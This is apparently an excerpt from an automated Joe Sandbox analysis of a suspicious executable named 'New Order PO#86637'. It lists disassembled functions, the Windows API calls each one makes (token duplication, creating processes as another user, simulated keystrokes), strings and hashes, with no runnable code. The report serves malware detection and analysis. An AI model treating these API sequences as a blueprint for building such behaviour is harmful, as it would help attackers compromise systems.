                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                            • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                                                            • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                                                            • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                            • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                            • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                            • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                            • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                                            • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                                            • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __lock_file
                                                                            • String ID:
                                                                            • API String ID: 3031932315-0
                                                                            • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                            • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                            • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                            • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                            • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                                            • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                                            • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 04209973
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2085910574.0000000004209000.00000040.00000020.00020000.00000000.sdmp, Offset: 04209000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4209000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                            • Instruction ID: 17ae46e21aade992de39fbfbce68cf00b9aa30b034a986e7887f47c0687f5229
                                                                            • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                            • Instruction Fuzzy Hash: 8AE0867173510CEFCB10CBAC89046AD73E4A704310F008A54A417C31C2E530A980D758
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 04209943
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2085910574.0000000004209000.00000040.00000020.00020000.00000000.sdmp, Offset: 04209000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4209000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                            • Instruction ID: ef1c540f44b59f86af17a0e4749e9e8ff76133942aa506b700f5cb1350ed4e1f
                                                                            • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                            • Instruction Fuzzy Hash: 5AD05E71A1520DEBCB10CEA499049DE73A89705360F008754E91A832C2D531A9409754
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __wfsopen
                                                                            • String ID:
                                                                            • API String ID: 197181222-0
                                                                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                            • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                            • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                            APIs
                                                                            • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                            • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                            • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                            • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 0420B339
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2085910574.0000000004209000.00000040.00000020.00020000.00000000.sdmp, Offset: 04209000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4209000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                            • Instruction ID: 216bddfaa4378fbf035e591d47d051b71c3de98595c9fd0be4b61d7eea6a89a3
                                                                            • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                            • Instruction Fuzzy Hash: 6AE0BF7594010DEFDB10DFE4D5496DD7BB4EF04301F1045A1FD05D7680DB309E548A62
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 0420B339
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2085910574.0000000004209000.00000040.00000020.00020000.00000000.sdmp, Offset: 04209000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_4209000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction ID: 26592b8f60b6981c28a1e26fa02558e61bda082ffa85889775f6f07411cd9950
                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction Fuzzy Hash: C2E0E67594010DDFDB00DFF4D54969D7FF4EF04301F104561FD01D2280D6309D508A62
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                            • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                            • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                            • GetKeyState.USER32(00000009), ref: 0047C936
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                            • GetKeyState.USER32(00000010), ref: 0047C953
                                                                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                            • _wcsncpy.LIBCMT ref: 0047CA29
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                            • SendMessageW.USER32 ref: 0047CA7F
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                            • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                            • ImageList_SetDragCursorImage.COMCTL32(00BFF530,00000000,00000000,00000000), ref: 0047CB9B
                                                                            • ImageList_BeginDrag.COMCTL32(00BFF530,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                            • SetCapture.USER32(?), ref: 0047CBB6
                                                                            • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                            • ReleaseCapture.USER32 ref: 0047CC3A
                                                                            • GetCursorPos.USER32(?), ref: 0047CC72
                                                                            • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                            • SendMessageW.USER32 ref: 0047CD12
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                            • SendMessageW.USER32 ref: 0047CD80
                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                            • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                            • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                            • GetParent.USER32(00000000), ref: 0047CDF7
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                            • SendMessageW.USER32 ref: 0047CE93
                                                                            • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,009E1C00,00000000,?,?,?,?), ref: 0047CF1C
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                            • SendMessageW.USER32 ref: 0047CF6B
                                                                            • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,009E1C00,00000000,?,?,?,?), ref: 0047CFE6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                            • String ID: @GUI_DRAGID$F
                                                                            • API String ID: 3100379633-4164748364
                                                                            • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                            • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                            • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                            • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 00434420
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                            • IsIconic.USER32(?), ref: 0043444F
                                                                            • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                            • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                            • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                            • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                            • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                            • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                            • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 2889586943-2988720461
                                                                            • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                            • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                            • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                            • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                            APIs
                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                            • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                            • GetProcessWindowStation.USER32 ref: 004463D1
                                                                            • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                            • _wcslen.LIBCMT ref: 00446498
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • _wcsncpy.LIBCMT ref: 004464C0
                                                                            • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                            • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                            • CloseDesktop.USER32(?), ref: 0044657A
                                                                            • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                            • CloseHandle.KERNEL32(?), ref: 00446592
                                                                            • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                            • String ID: $@OH$default$winsta0
                                                                            • API String ID: 3324942560-3791954436
                                                                            • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                            • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                            • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                            • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 004096C1
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • _memmove.LIBCMT ref: 0040970C
                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                            • _memmove.LIBCMT ref: 00409D96
                                                                            • _memmove.LIBCMT ref: 0040A6C4
                                                                            • _memmove.LIBCMT ref: 004297E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
